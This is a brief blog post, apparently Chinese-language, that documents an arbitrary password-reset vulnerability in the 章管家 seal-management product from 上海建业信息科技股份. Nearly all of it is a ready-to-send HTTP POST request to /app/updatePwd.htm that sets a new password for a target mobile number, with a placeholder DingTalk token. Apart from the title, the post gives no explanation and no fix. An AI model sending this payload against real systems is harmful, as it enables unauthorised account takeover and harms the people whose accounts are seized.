Babing
Published on 2024-08-30 / 1 Visits
0
0

S44-3上海建业信息科技股份-章管家-PermissionAC

S44-3上海建业信息科技股份-章管家-PermissionAC

漏洞复现:

任意账号密码重置漏洞
payload:

POST /app/updatePwd.htm HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 87
Content-Type: application/x-www-form-urlencoded

mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token

Comment